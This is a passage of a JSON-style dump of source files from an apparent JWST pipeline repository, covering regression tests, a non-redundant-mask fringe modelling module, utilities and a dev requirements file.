re.match(LEVEL3_PRODUCT_NAME_REGEX, product_name)\n assert m is not None\n" }, { "alpha_fraction": 0.5353634357452393, "alphanum_fraction": 0.6060903668403625, "avg_line_length": 34.10344696044922, "blob_id": "fea75435592769085a6ccd4a1231f082d484eb61", "content_id": "bd2e4b303ebf7fda5c7712ad55fa3eac9bee1f37", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "permissive", "max_line_length": 86, "num_lines": 29, "path": "/jwst/tests_nightly/general/nircam/test_image2pipeline_2b.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_image2 import Image2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n 
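# locations of the input data and reference \"truth\" files used by the BaseJWSTTest helpers\n    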
input_loc = 'nircam'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_image2pipeline2b(self):\n \"\"\"\n Regression test of calwebb_image2 pipeline performed on NIRCam data,\n using a multiple integration rate (rateints) file as input.\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw82500001003_02101_00001_NRCALONG_rateints.fits')\n output_file = 'jw82500001003_02101_00001_NRCALONG_calints.fits'\n\n Image2Pipeline.call(input_file,\n output_file=output_file)\n\n outputs = [(output_file,\n 'jw82500001003_02101_00001_NRCALONG_calints_ref.fits',\n ['primary','sci','err','dq','area']\n )\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5447866320610046, "alphanum_fraction": 0.5574570894241333, "avg_line_length": 31.799423217773438, "blob_id": "5b798a6c6d4972e2dafc7c3216e55020769f8fbd", "content_id": "bf42467da5273c275d405ef4b604269a41685a2d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22730, "license_type": "permissive", "max_line_length": 84, "num_lines": 693, "path": "/jwst/ami/nrm_model.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# A module for conveniently manipulating an 'NRM object' using the\n# Lacour-Greenbaum algorithm. First written by Alexandra Greenbaum in 2014.\n#\n# This module:\n# Defines mask geometry and detector-scale parameters\n# Simulates PSF (broadband or monochromatic)\n# Builds a fringe model - either by user definition, or automated to data\n# Fits model to data by least squares\n#\n# Algorithm documented in: Greenbaum, A. Z., Pueyo, L. P.,\n# Sivaramakrishnan, A., and Lacour, S. ; Astrophysical Journal (submitted) 2014.\n# Developed with NASA APRA (AS, AZG), NSF GRFP (AZG), NASA Sagan (LP), and\n# French taxpayer (SL) support.\n#\n# Heritage mathematica nb from Alex Greenbaum & Laurent Pueyo\n# Heritage python by Alex Greenbaum & Anand Sivaramakrishnan Jan 2013\n# - updated May 2013 to include hexagonal envelope\n# - updated (hard refactored) Oct-Nov 2014 Anand S.\n\nimport logging\nimport numpy as np\n\nfrom . import leastsqnrm as leastsqnrm\nfrom . import analyticnrm2\nfrom . import utils\nfrom . import hexee\nfrom . 
import nrm_consts\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\nclass NrmModel:\n\n def __init__(self, mask=None, holeshape=\"circ\", pixscale=hexee.mas2rad(65),\n rotate=False, over=1, flip=False, pixweight=None, scallist=None,\n rotlist_deg=None, phi=\"perfect\"):\n \"\"\"\n Short Summary\n -------------\n Set attributes of NrmModel class.\n\n Parameters\n ----------\n mask: string\n keyword for built-in values\n\n holeshape: string\n shape of apertures\n\n pixscale: float\n initial estimate of pixel scale in radians\n\n rotate: float\n initial estimate of rotation in radians\n\n over: integer\n oversampling factor\n\n flip: Boolean, default=False\n change sign of 2nd coordinate of holes\n\n pixweight: 2D float array, default is None\n weighting array\n\n scallist: float 1D array\n candidate relative pixel scales\n\n rotlist_deg: float 1D array\n Search window for rotation fine-tuning, in degrees\n\n phi: float 1D array\n distance of fringe from hole center in units of waves\n \"\"\"\n self.holeshape = holeshape\n self.pixel = pixscale\n self.over = over\n self.maskname = mask\n self.pixweight = pixweight\n\n if mask.lower() == 'jwst':\n self.ctrs = np.array( [[ 0.00000000, -2.640000],\n [-2.2863100, 0.0000000],\n [ 2.2863100 , -1.3200001],\n [-2.2863100 , 1.3200001],\n [-1.1431500 , 1.9800000],\n [ 2.2863100 , 1.3200001],\n [ 1.1431500 , 1.9800000]] )\n self.d = 0.80\n self.D = 6.5\n else:\n try:\n log.debug('mask.ctrs:%s', mask.ctrs)\n except AttributeError:\n raise AttributeError(\"mask must be either 'jwst' \\\n or NRM_mask_geometry object\")\n\n log.debug('NrmModel: ctrs flipped in init for CV1, CV2')\n\n if rotate:\n log.info('Providing additional rotation %s degrees',\n rotate * 180. / np.pi)\n\n # Rotates vector counterclockwise in coordinates\n self.rotation = rotate\n self.ctrs = leastsqnrm.rotatevectors(self.ctrs, rotate)\n\n # From now on this 'rotated' set of centers is used as the\n # nominal, and rotation searches (using rotlist_rad) are\n # performed with this rotated version of the 'as designed'\n # mask.. In CV1 and CV2 the mask is \"flipped\" by\n # multiplying ctrs[:1] by -1... which places segment B4\n # (the 6 o clock segment) at the top instead of at bottom\n # in traditional XY plots\n\n self.N = len(self.ctrs)\n\n if scallist is None:\n self.scallist = np.array([0.995, 0.998, 1.0, 1.002, 1.005, ])\n else:\n self.scallist = scallist\n\n if rotlist_deg is None:\n self.rotlist_rad = np.array([-1.0,-0.5,0.0,0.5,1.0]) * np.pi / 180.0\n else:\n self.rotlist_rad = rotlist_deg * np.pi / 180.0\n\n if phi == \"perfect\":\n self.phi = np.zeros(len(self.ctrs))\n elif phi == 'nb':\n self.phi = nrm_consts.phi_nb\n else:\n self.phi = phi\n\n\n def simulate(self, fov=None, bandpass=None, over=None, pixweight=None,\n pixel=None, rotate=False, centering=\"PIXELCENTERED\"):\n \"\"\"\n Short Summary\n -------------\n Simulate a psf using parameters input from the call and already stored in\n the object. It also generates a simulation fits header storing all of the\n parameters used to generate that psf. 
If the input bandpass is one\n number it will calculate a monochromatic PSF.\n\n Parameters\n ----------\n fov: integer, default=None\n number of detector pixels on a side\n\n bandpass: 2D float array, default=None\n array of the form: [(weight1, wavl1), (weight2, wavl2), ...]\n\n over: integer\n Oversampling factor\n\n pixweight: 2D float array, default=None\n weighting array\n\n pixel: float, default=None\n pixel scale\n\n rotate: float, default=False,\n rotation angle in radians\n\n centering: string, default=None\n type of centerings\n\n Returns\n -------\n Object's 'psf': float 2D array\n simulated psf\n \"\"\"\n # First set up conditions for choosing various parameters\n if fov is None:\n if not hasattr(self, 'fov'):\n log.critical('Field is not specified')\n return None\n else:\n self.fov_sim = self.fov\n log.debug('Using predefined FOV size: %s', self.fov)\n else:\n self.fov_sim = fov\n\n if hasattr(centering, '__iter__'):\n if centering == 'PIXELCENTERED':\n centering=(0.5, 0.5)\n elif centering == 'PIXELCORNER':\n centering=(0.0, 0.0)\n\n self.bandpass = bandpass\n\n if not hasattr(self, 'over'):\n if over is None:\n self.over = 1\n else:\n self.over = over\n\n if self.over is None:\n self.over = over\n\n if pixweight is not None:\n self.over = self.pixweight.shape[0]\n\n self.phi = np.zeros(len(self.ctrs))\n\n if rotate: # this is a 'temporary' rotation of self.ctrs\n # without altering self.ctrs\n self.rotate = rotate\n self.rotctrs = leastsqnrm.rotatevectors(self.ctrs, self.rotate)\n else:\n self.rotctrs = self.ctrs\n\n if pixel is None:\n self.pixel_sim = self.pixel\n else:\n self.pixel_sim = pixel\n\n # The polychromatic case:\n if hasattr(self.bandpass, '__iter__'):\n log.debug(\"------Simulating Polychromatic------\")\n self.psf_over = np.zeros((self.over*self.fov_sim,\n self.over*self.fov_sim))\n for w,l in self.bandpass: # w: weight, l: lambda (wavelength)\n self.psf_over += w*analyticnrm2.PSF(self.pixel_sim,\n self.fov_sim, self.over, self.rotctrs, self.d, l,\n self.phi, centering = centering, shape=self.holeshape)\n\n log.debug(\"BINNING UP TO PIXEL SCALE\")\n\n # The monochromatic case if bandpass input is a single wavelength\n else:\n self.lam = bandpass\n\n log.debug(\"Calculating Oversampled PSF\")\n self.psf_over = analyticnrm2.PSF(self.pixel_sim, self.fov_sim,\n self.over, self.rotctrs, self.d, self.lam,\n self.phi, centering=centering,\n shape=self.holeshape)\n\n self.psf = utils.rebin(self.psf_over, (self.over, self.over))\n\n return self.psf\n\n\n def make_model(self, fov=None, bandpass=None, over=False,\n centering='PIXELCENTERED', pixweight=None, pixscale=None,\n rotate=False, flip=False):\n \"\"\"\n Short Summary\n -------------\n Generates the fringe model with the attributes of the object\n using a bandpass as a list of tuples.\n\n Parameters\n ----------\n fov: integer, default=None\n number of detector pixels on a side\n\n bandpass: 2D float array, default=None\n array of the form: [(weight1, wavl1), (weight2, wavl2), ...]\n\n over: integer\n oversampling factor\n\n centering: string, default=None\n type of centering\n\n pixweight: 2D float array, default=None\n weighting array\n\n pixscale: float, default=None\n pixel scale\n\n rotate: float, default=False\n rotation angle in radians\n\n flip: Boolean, default=False\n change sign of 2nd coordinate of holes\n\n Returns\n -------\n Object's 'model': fringe model\n Generated fringe model\n \"\"\"\n if fov:\n self.fov = fov\n\n if over is False:\n self.over = 1\n else:\n self.over = over\n\n if pixweight 
is not None:\n self.over = self.pixweight.shape[0]\n\n if hasattr(self, 'pixscale_measured'):\n if self.pixscale_measured is not None:\n self.modelpix = self.pixscale_measured\n\n if pixscale is None:\n self.modelpix = self.pixel\n else:\n self.modelpix = pixscale\n\n if rotate:\n if flip is True:\n self.modelctrs = leastsqnrm.flip(\n leastsqnrm.rotatevectors(self.ctrs, self.rot_measured))\n else:\n self.modelctrs = leastsqnrm.rotatevectors(\n self.ctrs, self.rot_measured)\n else:\n self.modelctrs = self.ctrs\n\n if not hasattr(bandpass, '__iter__'):\n self.lam = bandpass\n self.model = np.ones((self.fov, self.fov, self.N*(self.N-1)+2))\n self.model_beam, self.fringes = leastsqnrm.model_array(\n self.modelctrs, self.lam, self.over, self.modelpix,\n self.fov, self.d, shape=self.holeshape, centering=centering)\n\n log.debug(\"centering: {0}\".format(centering))\n log.debug(\"what primary beam has the model created?\"+\n \" {0}\".format(self.model_beam))\n\n # this routine multiplies the envelope by each fringe \"image\"\n self.model_over = leastsqnrm.multiplyenv(self.model_beam, self.fringes)\n\n self.model = np.zeros((self.fov,self.fov, self.model_over.shape[2]))\n\n # loop over slices \"sl\" in the model\n for sl in range(self.model_over.shape[2]):\n self.model[:,:,sl] = utils.rebin( self.model_over[:,:,sl],\n (self.over, self.over))\n return self.model\n\n else:\n self.bandpass = bandpass\n\n # The model shape is (fov) x (fov) x (# solution coefficients)\n # the coefficient refers to the terms in the analytic equation\n # There are N(N-1) independent pistons, double-counted by cosine\n # and sine, one constant term and a DC offset.\n self.model = np.ones((self.fov, self.fov, self.N*(self.N-1)+2))\n self.model_beam = np.zeros((self.over*self.fov, self.over*self.fov))\n self.fringes = np.zeros((\n self.N*(self.N-1)+1, self.over*self.fov, self.over*self.fov))\n\n for w,l in self.bandpass: # w: weight, l: lambda (wavelength)\n # model_array returns the envelope and fringe model\n pb, ff = leastsqnrm.model_array(\n self.modelctrs, l, self.over, self.modelpix, self.fov,\n self.d, shape=self.holeshape, centering=centering)\n\n log.debug(\"centering: {0}\".format(centering))\n log.debug(\"what primary beam has the model created? {0}\".format(pb))\n\n self.model_beam += pb\n self.fringes += ff\n\n # this routine multiplies the envelope by each fringe \"image\"\n self.model_over = leastsqnrm.multiplyenv(pb, ff)\n\n model_binned = np.zeros((\n self.fov,self.fov, self.model_over.shape[2]))\n\n # loop over slices \"sl\" in the model\n for sl in range(self.model_over.shape[2]):\n model_binned[:,:,sl] = utils.rebin(\n self.model_over[:,:,sl], (self.over, self.over))\n\n self.model += w*model_binned\n\n return self.model\n\n\n def fit_image(self, image, reference=None, pixguess=None, rotguess=0,\n modelin=None, weighted=False, centering='PIXELCENTERED',\n savepsfs=True):\n \"\"\"\n Short Summary\n -------------\n Run a least-squares fit on an input image; find the appropriate\n wavelength scale and rotation. 
If a model is not specified, this\n        method will also determine the appropriate\n        wavelength scale and rotation (centering is not yet\n        determined here and is not stored in the object).\n\n        Parameters\n        ----------\n        image: 2D float array\n            input image\n\n        reference: 2D float array\n            input reference image\n\n        pixguess: float\n            estimate of pixel scale of the data\n\n        rotguess: float\n            estimate of rotation\n\n        modelin: 2D array\n            optional model image\n\n        weighted: boolean\n            use weighted operations in the least squares routine\n\n        centering: string, default=None\n            type of centering\n\n        savepsfs: boolean\n            save the psfs for writing to file (currently unused)\n\n        Returns\n        -------\n        None\n        \"\"\"\n        self.model_in = modelin\n        self.weighted = weighted\n        self.saveval = savepsfs\n\n        if modelin is None: # No model provided\n            # Perform a set of automatic routines:\n            # a cleaned-up version of the image enables Fourier fitting for\n            # centering (cross-correlation with FindCentering()) and for\n            # magnification and rotation via improve_scaling().\n\n            if reference is None:\n                self.reference = image\n                if np.isnan(image).any():\n                    raise ValueError(\"Must have a NaN-free image to \"+\n                                     \"crosscorrelate for scale; the reference \"+\n                                     \"image should also be centered.\")\n            else:\n                self.reference = reference\n\n            if pixguess is None or rotguess is None:\n                raise ValueError(\"MUST SPECIFY GUESSES FOR PIX & ROT\")\n\n            self.improve_scaling(self.reference, scaleguess=self.pixel,\n                                 rotstart=rotguess, centering=centering)\n\n            self.pixscale_measured = self.pixscale_factor*self.pixel\n\n            self.fov = image.shape[0]\n            self.fittingmodel = self.make_model(self.fov, bandpass=self.bandpass,\n                over=self.over, rotate=True, centering=centering,\n                pixscale=self.pixscale_measured)\n        else:\n            self.fittingmodel = modelin\n\n        if weighted is not False:\n            self.soln, self.residual = leastsqnrm.weighted_operations(image,\n                self.fittingmodel, weights=self.weighted)\n        else:\n            self.soln, self.residual, self.cond = leastsqnrm.matrix_operations(\n                image, self.fittingmodel)\n\n        self.rawDC = self.soln[-1]\n        self.flux = self.soln[0]\n        self.soln = self.soln/self.soln[0]\n        self.deltapsin = leastsqnrm.sin2deltapistons(self.soln)\n        self.deltapcos = leastsqnrm.cos2deltapistons(self.soln)\n\n        self.fringeamp, self.fringephase = leastsqnrm.tan2visibilities(self.soln)\n        self.piston = utils.fringes2pistons(self.fringephase, len(self.ctrs))\n        self.closurephase = leastsqnrm.closurephase(self.fringephase, N=self.N)\n        self.redundant_cps = leastsqnrm.redundant_cps(self.fringephase, N=self.N)\n        self.redundant_cas = leastsqnrm.return_CAs(self.fringeamp, N=self.N)\n\n\n    def create_modelpsf(self):\n        \"\"\"\n        Short Summary\n        -------------\n        Make an image from the object's model and fit solutions, by setting the\n        NrmModel object's modelpsf attribute\n\n        Parameters\n        ----------\n        None\n\n        Returns\n        -------\n        None\n        \"\"\"\n        try:\n            self.modelpsf = np.zeros((self.fov, self.fov))\n        except AttributeError:\n            self.modelpsf = np.zeros((self.fov_sim, self.fov_sim))\n\n        for ind, coeff in enumerate(self.soln):\n            self.modelpsf += self.flux * coeff * self.fittingmodel[:, :, ind]\n\n        return None\n\n\n    def improve_scaling(self, img, scaleguess=None, rotstart=0.0,\n                        centering='PIXELCENTERED'):\n        \"\"\"\n        Short Summary\n        -------------\n        Determine the scale and rotation that best fit the data. 
Correlations\n are calculated in the image plane, in anticipation of data with many\n bad pixels.\n\n Parameters\n ----------\n img: 2D float array\n input image\n\n scaleguess: float\n initial estimate of pixel scale in radians\n\n rotstart: float\n estimate of rotation\n\n centering: string, default='PIXELCENTERED'\n type of centering\n\n Returns\n -------\n self.pixscale_factor: float\n improved estimate of pixel scale in radians\n\n self.rot_measured: float\n value of mag at the extreme value of rotation from quadratic fit\n\n self.gof: float\n goodness of fit\n \"\"\"\n if not hasattr(self, 'bandpass'):\n raise ValueError(\"This object has no specified bandpass/wavelength\")\n\n reffov = img.shape[0]\n scal_corrlist = np.zeros((len(self.scallist), reffov, reffov))\n pixscl_corrlist = scal_corrlist.copy()\n scal_corr = np.zeros(len(self.scallist))\n self.pixscl_corr = scal_corr.copy()\n\n # User can specify a reference set of phases (m) at an earlier point so\n # that all PSFs are simulated with those phase pistons (e.g. measured\n # from data at an earlier iteration\n if not hasattr(self, 'refphi'):\n self.refphi = np.zeros(len(self.ctrs))\n else:\n pass\n\n self.pixscales = np.zeros(len(self.scallist))\n for q, scal in enumerate(self.scallist):\n self.test_pixscale = self.pixel*scal\n self.pixscales[q] = self.test_pixscale\n psf = self.simulate(bandpass=self.bandpass, fov=reffov,\n pixel = self.test_pixscale, centering=centering)\n pixscl_corrlist[q,:,:] = run_data_correlate(img,psf)\n self.pixscl_corr[q] = np.max(pixscl_corrlist[q])\n if True in np.isnan(self.pixscl_corr):\n raise ValueError(\"Correlation produced NaNs, check your work!\")\n\n self.pixscale_optimal, scal_maxy = utils.findmax(\n mag=self.pixscales, vals=self.pixscl_corr)\n self.pixscale_factor = self.pixscale_optimal / self.pixel\n\n radlist = self.rotlist_rad\n corrlist = np.zeros((len(radlist), reffov, reffov))\n self.corrs = np.zeros(len(radlist))\n\n self.rots = radlist\n for q,rad in enumerate(radlist):\n psf = self.simulate(bandpass=self.bandpass, fov=reffov,\n pixel=self.pixscale_optimal, rotate=rad, centering=centering)\n\n corrlist[q,:,:] = run_data_correlate(psf, img)\n self.corrs[q] = np.max(corrlist[q])\n\n self.rot_measured, maxy = utils.findmax(mag=self.rots, vals = self.corrs)\n self.refpsf = self.simulate(bandpass=self.bandpass,\n pixel=self.pixscale_factor*self.pixel, fov=reffov,\n rotate=self.rot_measured, centering=centering)\n\n try:\n self.gof = goodness_of_fit(img,self.refpsf)\n except Exception:\n self.gof = False\n\n return self.pixscale_factor, self.rot_measured, self.gof\n\n\ndef makedisk(N, R, ctr=(0,0)):\n \"\"\"\n Short Summary\n -------------\n Calculate a 'disk', an array whose values =1 in a circular region near\n the center of the array, and =0 elsewhere. 
(Anand's emailed version)\n\n Parameters\n ----------\n N: integer\n size of 1 dimension of the array to be returned\n\n R: integer\n radius of disk\n\n ctr: (integer, integer)\n center of disk\n\n array: 'ODD' or 'EVEN'\n parity of size of edge\n\n Returns\n -------\n array: 2D integer array\n \"\"\"\n if N%2 == 1: # odd\n M = (N-1)/2\n xx = np.linspace(-M-ctr[0],M-ctr[0],N)\n yy = np.linspace(-M-ctr[1],M-ctr[1],N)\n if N%2 == 0: # even\n M = N/2\n xx = np.linspace(-M-ctr[0],M-ctr[0]-1,N)\n yy = np.linspace(-M-ctr[1],M-ctr[1]-1,N)\n\n (x,y) = np.meshgrid(xx, yy.T)\n r = np.sqrt((x**2)+(y**2))\n array = np.zeros((N,N))\n array[r<R] = 1\n\n return array\n\n\ndef goodness_of_fit(data, bestfit, diskR=8):\n \"\"\"\n Short Summary\n -------------\n Calculate goodness of fit between the data and the fit.\n\n Parameters\n ----------\n data: 2D float array\n input image\n\n bestfit: 2D float array\n fit to input image\n\n diskR: integer\n radius of disk\n\n Returns\n -------\n gof: float\n goodness of fit\n \"\"\"\n mask = np.ones(data.shape) + makedisk(data.shape[0], 2) -\\\n makedisk(data.shape[0], diskR)\n\n difference = np.ma.masked_invalid(mask * (bestfit - data))\n\n masked_data = np.ma.masked_invalid(mask * data)\n\n gof = abs(difference).sum() / abs(masked_data).sum()\n\n return gof\n\n\ndef run_data_correlate(data, model):\n \"\"\"\n Short Summary\n -------------\n Calculate correlation between data and model\n\n Parameters\n ----------\n data: 2D float array\n reference image\n\n model: 2D float array\n simulated psf\n\n Returns\n -------\n cor: 2D float array\n correlation between data and model\n\n \"\"\"\n sci = data\n log.debug('shape sci: %s', np.shape(sci))\n\n cor = utils.rcrosscorrelate(sci, model)\n\n return cor\n" }, { "alpha_fraction": 0.8136646151542664, "alphanum_fraction": 0.8136646151542664, "avg_line_length": 52.66666793823242, "blob_id": "610a0ccdf24295f5e4fb4b6c06417ee776ddfc0c", "content_id": "780e2c5bf5d71c011ba7e8d48d3c0bad03403dc4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 322, "license_type": "permissive", "max_line_length": 59, "num_lines": 6, "path": "/requirements-dev.txt", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "git+https://github.com/spacetelescope/asdf#egg=asdf\ngit+https://github.com/astropy/astropy#egg=astropy\ngit+https://github.com/spacetelescope/crds#egg=crds\ngit+https://github.com/spacetelescope/gwcs#egg=gwcs\ngit+https://github.com/astropy/photutils#egg=photutils\ngit+https://github.com/spacetelescope/tweakwcs#egg=tweakwcs\n" }, { "alpha_fraction": 0.7849462628364563, "alphanum_fraction": 0.7849462628364563, "avg_line_length": 30, "blob_id": "9e5e528c9375e405387b75298a6cf59c387e1b16", "content_id": "5939c8b71bd9eb3ff55a16a66f9eac5a3e1fb8b4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "permissive", "max_line_length": 56, "num_lines": 3, "path": "/jwst/master_background/__init__.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .master_background_step import MasterBackgroundStep\n\n__all__ = ['MasterBackgroundStep']\n" }, { "alpha_fraction": 0.6214713454246521, "alphanum_fraction": 0.6223267912864685, "avg_line_length": 25.56818199157715, "blob_id": "9b12b5811bf95cef3e7b0f40ebca36794073ae8a", "content_id": "794593ec41766a7cd5e9ac03d9468d81fc29ce16", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 2338, "license_type": "permissive", "max_line_length": 80, "num_lines": 88, "path": "/jwst/lib/basic_utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"General utility objects\"\"\"\nimport re\n\n\ndef multiple_replace(string, rep_dict):\n \"\"\"Single-pass replacement of multiple substrings\n\n Similar to `str.replace`, except that a dictionary of replacements\n can be specified.\n\n The replacements are done in a single-pass. This means that a previous\n replacement will not be replaced by a subsequent match.\n\n Parameters\n ----------\n string: str\n The source string to have replacements done on it.\n\n rep_dict: dict\n The replacements were key is the input substring and\n value is the replacement\n\n Returns\n -------\n replaced: str\n New string with the replacements done\n\n Examples\n --------\n Basic example that also demonstrates the single-pass nature.\n If the replacements where chained, the result would have been\n 'lamb lamb'\n\n >>> multiple_replace('button mutton', {'but': 'mut', 'mutton': 'lamb'})\n 'mutton lamb'\n\n \"\"\"\n pattern = re.compile(\n \"|\".join([re.escape(k) for k in sorted(rep_dict,key=len,reverse=True)]),\n flags=re.DOTALL\n )\n return pattern.sub(lambda x: rep_dict[x.group(0)], string)\n\n\nclass LoggingContext:\n \"\"\"Logging context manager\n\n Keep logging configuration within a context\n\n Based on the Python 3 Logging Cookbook example\n\n Parameters\n ==========\n logger: logging.Logger\n The logger to modify.\n\n level: int\n The log level to set.\n\n handler: logging.Handler\n The handler to use.\n\n close: bool\n Close the handler when done.\n \"\"\"\n def __init__(self, logger, level=None, handler=None, close=True):\n self.logger = logger\n self.level = level\n self.handler = handler\n self.close = close\n\n self.old_level = None\n\n def __enter__(self):\n if self.level is not None:\n self.old_level = self.logger.level\n self.logger.setLevel(self.level)\n if self.handler:\n self.logger.addHandler(self.handler)\n\n def __exit__(self, et, ev, tb):\n if self.level is not None:\n self.logger.setLevel(self.old_level)\n if self.handler:\n self.logger.removeHandler(self.handler)\n if self.handler and self.close:\n self.handler.close()\n # implicit return of None => don't swallow exceptions\n" }, { "alpha_fraction": 0.5377128720283508, "alphanum_fraction": 0.6366585493087769, "avg_line_length": 36.3636360168457, "blob_id": "28981cc776b562979f4af6805b8ecaadf1cab787", "content_id": "acbbc6f1e5e5d750f32946526ed4d4d19c093b88", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1233, "license_type": "permissive", "max_line_length": 90, "num_lines": 33, "path": "/jwst/tests_nightly/general/niriss/test_nis_wfss_spec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.calwebb_spec2 import Spec2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_spec2pipeline', 'truth']\n test_dir = 'test_spec2pipeline'\n\n def test_nis_wfss_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRISS WFSS data.\n \"\"\"\n # Collect data\n asn_file = self.get_data(self.test_dir,\n 'jw87600-a3001_20171109T145456_spec2_001_asn.json')\n for file in raw_from_asn(asn_file):\n 
self.get_data(self.test_dir, file)\n\n # Run the step\n collect_pipeline_cfgs('cfgs')\n Spec2Pipeline.call(asn_file, config_file='cfgs/calwebb_spec2.cfg', save_bsub=True)\n\n # Test results.\n outputs = [('jw87600017001_02101_00002_nis_cal.fits',\n 'jw87600017001_02101_00002_nis_cal_ref.fits'),\n ('jw87600017001_02101_00002_nis_x1d.fits',\n 'jw87600017001_02101_00002_nis_x1d_ref.fits')]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5849056839942932, "alphanum_fraction": 0.619662344455719, "avg_line_length": 38.490196228027344, "blob_id": "8060c9252c7766aa95ceb7fc60ef0b30d1da1069", "content_id": "5bdbb8efe8fb8933eba988b3f9644a8d14116590", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2014, "license_type": "permissive", "max_line_length": 92, "num_lines": 51, "path": "/jwst/regtest/test_miri_image_detector1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\nfrom astropy.io.fits.diff import FITSDiff\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\[email protected](scope=\"module\")\ndef run_pipeline(jail, rtdata_module):\n \"\"\"Run calwebb_detector1 pipeline on MIRI imaging data.\"\"\"\n rtdata = rtdata_module\n rtdata.get_data(\"miri/image/jw00001001001_01101_00001_MIRIMAGE_uncal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/calwebb_detector1.cfg\", rtdata.input,\n \"--steps.dq_init.save_results=True\",\n \"--steps.lastframe.save_results=True\",\n \"--steps.firstframe.save_results=True\",\n \"--steps.saturation.save_results=True\",\n \"--steps.rscd.save_results=True\",\n \"--steps.linearity.save_results=True\",\n \"--steps.dark_current.save_results=True\",\n \"--steps.refpix.save_results=True\",\n \"--steps.jump.rejection_threshold=25\",\n \"--steps.jump.save_results=True\",\n \"--steps.ramp_fit.save_opt=True\",\n \"--steps.ramp_fit.save_results=True\"]\n\n Step.from_cmdline(args)\n return rtdata\n\n\[email protected]\[email protected](\"output\", ['rate', 'rateints', 'linearity', 'rscd',\n 'dq_init', 'firstframe', 'lastframe',\n 'saturation', 'dark_current', 'refpix',\n 'jump', 'fitopt'])\ndef test_miri_image_detector1(run_pipeline, request, fitsdiff_default_kwargs, output):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on MIRI data.\n \"\"\"\n\n rtdata = run_pipeline\n rtdata.output = \"jw00001001001_01101_00001_MIRIMAGE_\" + output + \".fits\"\n\n rtdata.get_truth(os.path.join(\"truth/test_miri_image_detector1\",\n \"jw00001001001_01101_00001_MIRIMAGE_\" + output + \".fits\"))\n\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5993969440460205, "alphanum_fraction": 0.6011199951171875, "avg_line_length": 33.649253845214844, "blob_id": "ccdcd9014299b5c4253a89b37315ba1e3ce75eb6", "content_id": "5748e26df39a3db7537941d2a5e8d55c5ef46b15", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4643, "license_type": "permissive", "max_line_length": 87, "num_lines": 134, "path": "/jwst/flatfield/flat_field_step.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from ..stpipe import Step\nfrom .. import datamodels\nfrom . import flat_field\n\n# For the following types of data, it is OK -- and in some cases\n# required -- for the extract_2d step to have been run. 
For all\n# other types of data, the extract_2d step must not have been run.\nEXTRACT_2D_IS_OK = [\n \"NRS_BRIGHTOBJ\",\n \"NRS_FIXEDSLIT\",\n \"NRS_LAMP\",\n \"NRS_MSASPEC\",\n ]\n\n# NIRSpec imaging types (see exp_type2transform in assign_wcs/nirspec.py)\nNRS_IMAGING_MODES = [\n \"NRS_CONFIRM\",\n \"NRS_FOCUS\",\n \"NRS_IMAGE\",\n \"NRS_MIMF\",\n \"NRS_MSATA\",\n \"NRS_TACONFIRM\",\n \"NRS_TACQ\",\n \"NRS_TASLIT\",\n \"NRS_WATA\",\n ]\n# Supported NIRSpec spectrographic types. No flat fielding for NRS_AUTOFLAT\nNRS_SPEC_MODES = [\n \"NRS_BRIGHTOBJ\",\n \"NRS_FIXEDSLIT\",\n \"NRS_IFU\",\n \"NRS_MSASPEC\",\n ]\n\n\n__all__ = [\"FlatFieldStep\"]\n\n\nclass FlatFieldStep(Step):\n \"\"\"Flat-field a science image using a flatfield reference image.\n \"\"\"\n\n spec = \"\"\"\n save_interpolated_flat = boolean(default=False) # Save interpolated NRS flat\n \"\"\"\n\n reference_file_types = [\"flat\", \"fflat\", \"sflat\", \"dflat\"]\n\n # Define a suffix for optional saved output of the interpolated flat for NRS\n flat_suffix = 'interpolatedflat'\n\n def process(self, input):\n\n input_model = datamodels.open(input)\n exposure_type = input_model.meta.exposure.type.upper()\n\n self.log.debug(\"Input is {} of exposure type {}\".format(\n input_model.__class__.__name__, exposure_type))\n\n if input_model.meta.instrument.name.upper() == \"NIRSPEC\":\n if (exposure_type not in 